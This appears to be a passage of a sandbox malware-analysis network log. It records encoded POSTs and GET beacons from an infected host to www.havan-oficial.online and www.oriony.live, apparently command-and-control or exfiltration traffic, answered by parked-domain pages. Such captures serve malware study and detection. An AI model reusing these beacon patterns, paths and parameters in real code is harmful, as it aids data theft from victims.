                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.havan-oficial.online
                                                                                                Origin: http://www.havan-oficial.online
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.havan-oficial.online/m462/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 7a 65 46 34 42 53 50 2b 6e 39 64 46 6f 64 55 65 66 32 31 54 47 6b 52 63 37 42 72 6f 68 4d 66 66 62 64 57 75 4e 4f 5a 30 52 48 72 42 6e 34 64 2f 50 67 6a 6a 76 4e 34 4d 30 34 78 76 55 2b 4c 33 45 77 75 6a 61 41 2b 52 69 37 74 73 43 52 64 58 48 62 54 56 36 32 36 63 71 4d 52 68 4a 68 34 73 38 33 2f 6e 43 4c 47 45 66 2b 36 79 74 63 47 51 6f 33 45 5a 61 62 44 43 46 4f 4c 75 53 44 47 6d 73 57 72 4f 48 75 42 52 69 43 77 6b 62 71 77 55 33 45 61 2f 64 4f 6e 54 43 54 73 53 31 46 67 64 6a 43 6b 57 68 54 43 39 76 53 71 62 32 42 76 59 36 39 75 45 53 71 5a 62 78 6e 48 49 4d 33 55 4d 62 77 3d 3d
                                                                                                Data Ascii: IBQP=zeF4BSP+n9dFodUef21TGkRc7BrohMffbdWuNOZ0RHrBn4d/PgjjvN4M04xvU+L3EwujaA+Ri7tsCRdXHbTV626cqMRhJh4s83/nCLGEf+6ytcGQo3EZabDCFOLuSDGmsWrOHuBRiCwkbqwU3Ea/dOnTCTsS1FgdjCkWhTC9vSqb2BvY69uESqZbxnHIM3UMbw==
                                                                                                Nov 11, 2024 17:05:29.606569052 CET1289INHTTP/1.1 200 OK
                                                                                                date: Mon, 11 Nov 2024 16:05:29 GMT
                                                                                                content-type: text/html; charset=utf-8
                                                                                                content-length: 1150
                                                                                                x-request-id: b866497d-374f-4207-9e05-d844bd04d35f
                                                                                                cache-control: no-store, max-age=0
                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==
                                                                                                set-cookie: parking_session=b866497d-374f-4207-9e05-d844bd04d35f; expires=Mon, 11 Nov 2024 16:20:29 GMT; path=/
                                                                                                connection: close
                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 38 42 52 46 4c 50 76 33 77 56 36 34 6a 69 49 49 78 47 57 43 56 44 38 48 2b 49 70 63 4c 5a 55 68 30 34 61 34 51 4a 53 4e 56 53 2b 6e 75 4b 41 6e 4f 2f 6f 33 58 37 5a 59 7a 33 6b 38 79 30 54 36 50 36 53 68 63 6a 67 44 6e 4d 5a 6d 63 73 62 77 67 7a 4e 68 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                Nov 11, 2024 17:05:29.606605053 CET550INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjg2NjQ5N2QtMzc0Zi00MjA3LTllMDUtZDg0NGJkMDRkMzVmIiwicGFnZV90aW1lIjoxNzMxMzQxMTI5LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaGF2YW4tb2ZpY2lhbC5


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                67192.168.11.2049818199.59.243.22780
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:05:32.127116919 CET800OUTPOST /m462/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.havan-oficial.online
                                                                                                Origin: http://www.havan-oficial.online
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.havan-oficial.online/m462/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 7a 65 46 34 42 53 50 2b 6e 39 64 46 71 39 6b 65 5a 55 64 54 52 30 51 75 31 68 72 6f 72 73 66 54 62 64 71 75 4e 4b 41 72 52 56 50 42 6e 59 4e 2f 4f 69 62 6a 73 4e 34 4d 73 6f 78 71 61 65 4c 43 45 77 7a 65 61 42 43 52 69 37 35 73 43 54 46 58 48 4b 54 57 34 6d 36 65 73 4d 52 6a 47 42 34 73 38 33 2f 6e 43 4c 54 5a 66 36 75 79 75 73 32 51 71 56 38 65 53 37 44 4e 54 65 4c 75 59 6a 47 69 73 57 72 73 48 76 64 37 69 41 34 6b 62 6f 34 55 35 31 61 38 4b 65 6e 56 63 6a 74 5a 34 33 38 53 6e 53 45 41 6b 78 72 67 72 42 32 58 36 33 69 43 6e 50 61 67 52 35 46 70 31 58 2b 67 4f 31 56 58 47 7a 71 55 67 36 57 6f 2b 37 47 58 2b 50 42 6a 6c 54 78 45 5a 30 63 3d
                                                                                                Data Ascii: IBQP=zeF4BSP+n9dFq9keZUdTR0Qu1hrorsfTbdquNKArRVPBnYN/OibjsN4MsoxqaeLCEwzeaBCRi75sCTFXHKTW4m6esMRjGB4s83/nCLTZf6uyus2QqV8eS7DNTeLuYjGisWrsHvd7iA4kbo4U51a8KenVcjtZ438SnSEAkxrgrB2X63iCnPagR5Fp1X+gO1VXGzqUg6Wo+7GX+PBjlTxEZ0c=
                                                                                                Nov 11, 2024 17:05:32.262219906 CET1289INHTTP/1.1 200 OK
                                                                                                date: Mon, 11 Nov 2024 16:05:32 GMT
                                                                                                content-type: text/html; charset=utf-8
                                                                                                content-length: 1150
                                                                                                x-request-id: b4c6324e-54f6-4e9d-8e04-fcb3a7c5eb65
                                                                                                cache-control: no-store, max-age=0
                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==
                                                                                                set-cookie: parking_session=b4c6324e-54f6-4e9d-8e04-fcb3a7c5eb65; expires=Mon, 11 Nov 2024 16:20:32 GMT; path=/
                                                                                                connection: close
                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 38 42 52 46 4c 50 76 33 77 56 36 34 6a 69 49 49 78 47 57 43 56 44 38 48 2b 49 70 63 4c 5a 55 68 30 34 61 34 51 4a 53 4e 56 53 2b 6e 75 4b 41 6e 4f 2f 6f 33 58 37 5a 59 7a 33 6b 38 79 30 54 36 50 36 53 68 63 6a 67 44 6e 4d 5a 6d 63 73 62 77 67 7a 4e 68 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                Nov 11, 2024 17:05:32.262269974 CET550INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjRjNjMyNGUtNTRmNi00ZTlkLThlMDQtZmNiM2E3YzVlYjY1IiwicGFnZV90aW1lIjoxNzMxMzQxMTMyLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaGF2YW4tb2ZpY2lhbC5


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                68192.168.11.2049819199.59.243.22780
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:05:34.800620079 CET2578OUTPOST /m462/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.havan-oficial.online
                                                                                                Origin: http://www.havan-oficial.online
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.havan-oficial.online/m462/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 7a 65 46 34 42 53 50 2b 6e 39 64 46 71 39 6b 65 5a 55 64 54 52 30 51 75 31 68 72 6f 72 73 66 54 62 64 71 75 4e 4b 41 72 52 56 48 42 6e 72 31 2f 4f 44 62 6a 74 4e 34 4d 67 49 78 72 61 65 4c 6c 45 77 37 53 61 42 4f 76 69 35 42 73 44 77 4e 58 51 49 37 57 78 6d 36 65 75 4d 52 6d 4a 68 34 39 38 33 76 6a 43 4c 44 5a 66 36 75 79 75 71 79 51 75 48 45 65 51 37 44 43 46 4f 4c 79 53 44 48 48 73 57 6a 57 48 76 5a 42 69 77 59 6b 56 6f 49 55 30 6d 79 38 56 75 6e 58 64 6a 73 5a 34 33 78 53 6e 53 59 6d 6b 79 32 31 72 43 57 58 35 68 36 63 69 73 66 34 41 34 77 6c 34 33 6a 65 59 58 4e 37 45 69 36 70 6a 59 65 49 79 2f 47 7a 30 64 4e 77 30 42 5a 37 48 42 45 63 73 32 6b 4a 6a 54 33 63 73 76 31 32 42 36 63 6c 56 75 79 46 64 4d 53 43 76 4f 42 36 75 5a 55 68 55 35 6f 67 46 57 75 4b 53 35 4e 57 37 46 54 75 56 2f 30 45 4d 47 68 57 31 45 78 33 52 71 7a 31 43 66 31 4a 4f 31 2b 6e 6e 53 58 63 38 35 4d 69 69 74 5a 76 39 6e 44 50 50 5a 2b 58 33 74 33 75 59 4f 45 32 57 72 4b 56 66 48 52 4f 70 5a 58 6a 47 54 32 77 65 [TRUNCATED]
                                                                                                Data Ascii: IBQP=zeF4BSP+n9dFq9keZUdTR0Qu1hrorsfTbdquNKArRVHBnr1/ODbjtN4MgIxraeLlEw7SaBOvi5BsDwNXQI7Wxm6euMRmJh4983vjCLDZf6uyuqyQuHEeQ7DCFOLySDHHsWjWHvZBiwYkVoIU0my8VunXdjsZ43xSnSYmky21rCWX5h6cisf4A4wl43jeYXN7Ei6pjYeIy/Gz0dNw0BZ7HBEcs2kJjT3csv12B6clVuyFdMSCvOB6uZUhU5ogFWuKS5NW7FTuV/0EMGhW1Ex3Rqz1Cf1JO1+nnSXc85MiitZv9nDPPZ+X3t3uYOE2WrKVfHROpZXjGT2weUm87fFwW8iDkD8TIGPZwSMcdj5ADB/qHtnIVAranSWYLj7kkjV44/DP+Pm/PxinxrAwBTVj9XugG2qWC5tC+oZswAkZx3nF1zQbDy7ShuubRWFibEk0ghR9gyuOLMI/VFqQDt2XBZF+DUIM93oWnypE+wUCMExD8vsIogz4mGRG3dr0xDg2rhZ1GamFv0iG6liH9WdEoBVwhxSKuodKvCJiVkI2LODfFNfqrjXrYHwhKGvq+Z+zK3bLFd6Aq+o+4a8lsdSOxLAaukuNxs17MqfIuu/MME6Y6HpmjUt0CS05oMLaB5T79B09FDM1dlqPJIN2fcIRqf9eQQt37AVqF7GvTBrIPjP15V8mqeZjh4jHyQ//4erzKAjiceKrWwZ5NB+/IdYaSP+h6dtHU9w3cPpCymGfEwMT9GNhl6n3BT3CndFMotm5EhfLAe2QZB35Y/qsBP+hEzJTPY1kbOjx8IxwQX7xh9196rckZsqrcXIl/yhY123lbaKclOshyBCYPfHETByBNVdldL3/bDoLXbznTH8s/WrphValp3yqRO8IeN/nNKLKfBuADCRJVnkPmpJO63H9KcEzBUQkbl6CH3/cnmYTDesnOrJnKpNdGq/v0e5Wy8A1RSwpjySD6+OVl0m7h/D6mAtUol/zjJ0KOTX7qo3SeBYY2AJ [TRUNCATED]
                                                                                                Nov 11, 2024 17:05:34.800676107 CET5371OUTData Raw: 65 49 2f 47 70 44 57 43 6f 30 68 30 44 64 78 36 4d 37 57 55 51 55 61 51 48 30 6b 49 33 61 57 4c 5a 54 6d 67 55 75 41 70 4f 32 6c 53 72 47 53 64 76 46 4d 6c 30 2f 48 65 59 41 51 5a 53 64 61 2f 32 48 4b 58 35 77 58 76 5a 4f 32 30 7a 66 4c 34 34 33
                                                                                                Data Ascii: eI/GpDWCo0h0Ddx6M7WUQUaQH0kI3aWLZTmgUuApO2lSrGSdvFMl0/HeYAQZSda/2HKX5wXvZO20zfL4430ON5BUELlJKQFMkgzIMfzJaW+qMol71wr/mfBA96f0ucz1rwMGrPyrS0NeDitOTipC5yNK4qafxTIllUzK7Owp1Tbr/fOf9MhBZxFyWijOdr1YcMSmH9ZX9pZnwcaHN9DFG3E6mOW6t1Nb72tzGMdTsfkjeNPQoSW
                                                                                                Nov 11, 2024 17:05:34.935899973 CET1289INHTTP/1.1 200 OK
                                                                                                date: Mon, 11 Nov 2024 16:05:34 GMT
                                                                                                content-type: text/html; charset=utf-8
                                                                                                content-length: 1150
                                                                                                x-request-id: c0dd3f6e-c992-4346-846a-dde344f0e2a8
                                                                                                cache-control: no-store, max-age=0
                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==
                                                                                                set-cookie: parking_session=c0dd3f6e-c992-4346-846a-dde344f0e2a8; expires=Mon, 11 Nov 2024 16:20:34 GMT; path=/
                                                                                                connection: close
                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 38 42 52 46 4c 50 76 33 77 56 36 34 6a 69 49 49 78 47 57 43 56 44 38 48 2b 49 70 63 4c 5a 55 68 30 34 61 34 51 4a 53 4e 56 53 2b 6e 75 4b 41 6e 4f 2f 6f 33 58 37 5a 59 7a 33 6b 38 79 30 54 36 50 36 53 68 63 6a 67 44 6e 4d 5a 6d 63 73 62 77 67 7a 4e 68 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                Nov 11, 2024 17:05:34.935949087 CET550INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzBkZDNmNmUtYzk5Mi00MzQ2LTg0NmEtZGRlMzQ0ZjBlMmE4IiwicGFnZV90aW1lIjoxNzMxMzQxMTM0LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaGF2YW4tb2ZpY2lhbC5


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                69192.168.11.2049820199.59.243.22780
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:05:37.468961954 CET504OUTGET /m462/?Lr3=uHMLTHRPCpsdapr&IBQP=+ctYCmnSkPlep9Adc1BBeyk16jbVmqK7c+CyNKpVFEvGl71cISvbhoUUnqNAW+fldTGCXi6FrrY6EQlGHI7/1BufmIEFBScb4VziJby0bO6di8KjpFsVcvc= HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.havan-oficial.online
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:05:37.603640079 CET1289INHTTP/1.1 200 OK
                                                                                                date: Mon, 11 Nov 2024 16:05:37 GMT
                                                                                                content-type: text/html; charset=utf-8
                                                                                                content-length: 1490
                                                                                                x-request-id: c376c6cc-9021-4d98-848d-91eda7a44165
                                                                                                cache-control: no-store, max-age=0
                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_FXHELMCSvHfvZQ3fdxfXMjkxnlVuXcTL5OPTt/qm0O8RYNA9u7PK9d0xDL6/WOOqcqXaX6SGwQ4cDMI0FbTepg==
                                                                                                set-cookie: parking_session=c376c6cc-9021-4d98-848d-91eda7a44165; expires=Mon, 11 Nov 2024 16:20:37 GMT; path=/
                                                                                                connection: close
                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 46 58 48 45 4c 4d 43 53 76 48 66 76 5a 51 33 66 64 78 66 58 4d 6a 6b 78 6e 6c 56 75 58 63 54 4c 35 4f 50 54 74 2f 71 6d 30 4f 38 52 59 4e 41 39 75 37 50 4b 39 64 30 78 44 4c 36 2f 57 4f 4f 71 63 71 58 61 58 36 53 47 77 51 34 63 44 4d 49 30 46 62 54 65 70 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_FXHELMCSvHfvZQ3fdxfXMjkxnlVuXcTL5OPTt/qm0O8RYNA9u7PK9d0xDL6/WOOqcqXaX6SGwQ4cDMI0FbTepg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                Nov 11, 2024 17:05:37.603722095 CET890INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzM3NmM2Y2MtOTAyMS00ZDk4LTg0OGQtOTFlZGE3YTQ0MTY1IiwicGFnZV90aW1lIjoxNzMxMzQxMTM3LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaGF2YW4tb2ZpY2lhbC5


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                70192.168.11.2049821192.64.118.22180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:05:42.910332918 CET753OUTPOST /baro/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.oriony.live
                                                                                                Origin: http://www.oriony.live
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.oriony.live/baro/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
